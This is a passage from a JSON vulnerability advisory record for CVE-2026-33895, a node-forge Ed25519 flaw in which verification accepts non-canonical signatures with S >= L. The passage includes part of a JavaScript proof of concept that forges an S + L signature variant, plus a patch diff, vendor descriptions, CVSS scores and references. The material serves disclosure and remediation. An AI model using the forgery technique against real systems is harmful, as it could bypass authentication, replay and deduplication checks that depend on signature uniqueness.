with s := s + L (mod 2^256), plus the 
carry.\nfunction addLToS(signature) {\n  if (!Buffer.isBuffer(signature) || signature.length !== 64) {\n    throw new Error('signature must be a 64-byte Buffer');\n  }\n  const out = Buffer.from(signature);\n  let carry = 0;\n  for (let i = 0; i < 32; i++) {\n    const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.\n    const sum = out[idx] + ED25519_ORDER_L[i] + carry;\n    out[idx] = sum & 0xff;\n    carry = sum >> 8;\n  }\n  return { sig: out, carry };\n}\n\nfunction toSpkiPem(publicKeyBytes) {\n  if (publicKeyBytes.length !== 32) {\n    throw new Error('publicKeyBytes must be 32 bytes');\n  }\n  // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.\n  const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);\n  const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);\n  const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);\n  const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);\n  const b64 = spki.toString('base64').match(/.{1,64}/g).join('\\n');\n  return `-----BEGIN PUBLIC KEY-----\\n${b64}\\n-----END PUBLIC KEY-----\\n`;\n}\n\nfunction verifyWithCrypto(publicKey, message, signature) {\n  try {\n    const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));\n    const ok = crypto.verify(null, message, keyObject, signature);\n    return { ok };\n  } catch (error) {\n    return { ok: false, error: error.message };\n  }\n}\n\nfunction toResult(label, original, tweaked) {\n  return {\n    [label]: {\n      original_valid: original.ok,\n      tweaked_valid: tweaked.ok,\n    },\n  };\n}\n\nfunction main() {\n  const kp = ed.generateKeyPair();\n  const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });\n  const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });\n  const tweaked = addLToS(sig);\n  const okTweaked = ed.verify({\n    message: MESSAGE,\n    signature: tweaked.sig,\n    publicKey: kp.publicKey,\n  
});\n  const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);\n  const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);\n  const result = {\n    ...toResult('forge', { ok }, { ok: okTweaked }),\n    ...toResult('crypto', cryptoOriginal, cryptoTweaked),\n  };\n  console.log(JSON.stringify(result, null, 2));\n}\n\nmain();\n```\n</details>\n\n## Suggested Patch\nAdd strict canonical scalar validation in Ed25519 verify path before scalar multiplication. (Parse S as little-endian 32-byte integer and reject if `S >= L`).\n\nHere is a patch we tested on our end to resolve the issue, though please verify it on your end:\n\n```diff\nindex f3e6faa..87eb709 100644\n--- a/lib/ed25519.js\n+++ b/lib/ed25519.js\n@@ -380,6 +380,10 @@ function crypto_sign_open(m, sm, n, pk) {\n     return -1;\n   }\n\n+  if(!_isCanonicalSignatureScalar(sm, 32)) {\n+    return -1;\n+  }\n+\n   for(i = 0; i < n; ++i) {\n     m[i] = sm[i];\n   }\n@@ -409,6 +413,21 @@ function crypto_sign_open(m, sm, n, pk) {\n   return mlen;\n }\n\n+function _isCanonicalSignatureScalar(bytes, offset) {\n+  var i;\n+  // Compare little-endian scalar S against group order L and require S < L.\n+  for(i = 31; i >= 0; --i) {\n+    if(bytes[offset + i] < L[i]) {\n+      return true;\n+    }\n+    if(bytes[offset + i] > L[i]) {\n+      return false;\n+    }\n+  }\n+  // S == L is non-canonical.\n+  return false;\n+}\n+\n function modL(r, x) {\n   var carry, i, j, k;\n   for(i = 63; i >= 32; --i) {\n```\n\n## Resources\n\n- RFC 8032 (Ed25519): https://datatracker.ietf.org/doc/html/rfc8032#section-8.4\n  - > Ed25519 and Ed448 signatures are not malleable due to the verification check that decoded S is smaller than l\n\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-q67f-28xg-22rw.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, as the specification (RFC 8032) requires. This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see CVE-2026-25793, CVE-2022-35961). Logic in applications that relies on signature uniqueness (e.g., deduplication by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed. Version 1.4.0 patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33895"
                },
                {
                    "category": "description",
                    "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, as the specification (RFC 8032) requires. This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see CVE-2026-25793, CVE-2022-35961). Logic in applications that relies on signature uniqueness (e.g., deduplication by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed. Version 1.4.0 patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33895.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript library used for Transport Layer Security (TLS). The library's Ed25519 signature verification process does not correctly validate cryptographic signatures, allowing forged non-canonical signatures to be accepted. A remote attacker could exploit this signature malleability to bypass authentication and authorization logic. This vulnerability can also circumvent security checks in applications that rely on the uniqueness of cryptographic signatures for functions such as deduplication or preventing replay attacks.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33895.json"
                },
                {
                    "category": "description",
                    "text": "Forge has signature forgery in Ed25519 due to a missing check that S < L (signatures with S >= L are accepted)",
                    "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "other",
                    "text": "0.00035",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.8",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product_remediation data available from source Redhat",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5920253",
                    "CSAFPID-5956281",
                    "CSAFPID-1439292",
                    "CSAFPID-1439294",
                    "CSAFPID-1439306",
                    "CSAFPID-1439317",
                    "CSAFPID-1439319",
                    "CSAFPID-1441200",
                    "CSAFPID-1455906",
                    "CSAFPID-1459353",
                    "CSAFPID-1459355",
                    "CSAFPID-1496261",
                    "CSAFPID-1508257",
                    "CSAFPID-1771999",
                    "CSAFPID-1837472",
                    "CSAFPID-1837473",
                    "CSAFPID-2109952",
                    "CSAFPID-2109953",
                    "CSAFPID-2467441",
                    "CSAFPID-2467442",
                    "CSAFPID-2467443",
                    "CSAFPID-2467444",
                    "CSAFPID-2467445",
                    "CSAFPID-2467448",
                    "CSAFPID-2552001",
                    "CSAFPID-2698055",
                    "CSAFPID-2698057",
                    "CSAFPID-2855724",
                    "CSAFPID-2855725",
                    "CSAFPID-2858634",
                    "CSAFPID-2868420",
                    "CSAFPID-2914696",
                    "CSAFPID-2914697",
                    "CSAFPID-5187689",
                    "CSAFPID-5222698",
                    "CSAFPID-5940623",
                    "CSAFPID-5940626",
                    "CSAFPID-5940629",
                    "CSAFPID-5197899",
                    "CSAFPID-5733329"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-q67f-28xg-22rw"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-q67f-28xg-22rw.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33895"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33895.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33895.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - microsoft",
                    "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35961"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25793"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-q67f-28xg-22rw"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33895"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to a widespread installation base, or stability.",
                    "product_ids": [
                        "CSAFPID-1439292",
                        "CSAFPID-1439294",
                        "CSAFPID-1439306",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1459353",
                        "CSAFPID-1459355",
                        "CSAFPID-1496261",
                        "CSAFPID-1508257",
                        "CSAFPID-1771999",
                        "CSAFPID-1837472",
                        "CSAFPID-1837473",
                        "CSAFPID-2109952",
                        "CSAFPID-2109953",
                        "CSAFPID-2467441",
                        "CSAFPID-2467442",
                        "CSAFPID-2467443",
                        "CSAFPID-2467444",
                        "CSAFPID-2467445",
                        "CSAFPID-2467448",
                        "CSAFPID-2552001",
                        "CSAFPID-2698055",
                        "CSAFPID-2698057",
                        "CSAFPID-2855724",
                        "CSAFPID-2855725",
                        "CSAFPID-2858634",
                        "CSAFPID-2868420",
                        "CSAFPID-2914696",
                        "CSAFPID-2914697",
                        "CSAFPID-5187689",
                        "CSAFPID-5222698",
                        "CSAFPID-5940623",
                        "CSAFPID-5940626",
                        "CSAFPID-5940629"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1439292",
                        "CSAFPID-1439294",
                        "CSAFPID-1439306",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1459353",
                        "CSAFPID-1459355",
                        "CSAFPID-1496261",
                        "CSAFPID-1508257",
                        "CSAFPID-1771999",
                        "CSAFPID-1837472",
                        "CSAFPID-1837473",
                        "CSAFPID-2109952",
                        "CSAFPID-2109953",
                        "CSAFPID-2467441",
                        "CSAFPID-2467442",
                        "CSAFPID-2467443",
                        "CSAFPID-2467444",
                        "CSAFPID-2467445",
                        "CSAFPID-2467448",
                        "CSAFPID-2552001",
                        "CSAFPID-2698055",
                        "CSAFPID-2698057",
                        "CSAFPID-2855724",
                        "CSAFPID-2855725",
                        "CSAFPID-2858634",
                        "CSAFPID-2868420",
                        "CSAFPID-2914696",
                        "CSAFPID-2914697",
                        "CSAFPID-5187689",
                        "CSAFPID-5197899",
                        "CSAFPID-5222698",
                        "CSAFPID-5733329",
                        "CSAFPID-5920253",
                        "CSAFPID-5940623",
                        "CSAFPID-5940626",
                        "CSAFPID-5940629",
                        "CSAFPID-5956281"
                    ]
                }
            ],
            "title": "CVE-2026-33895"
        }
    ]
}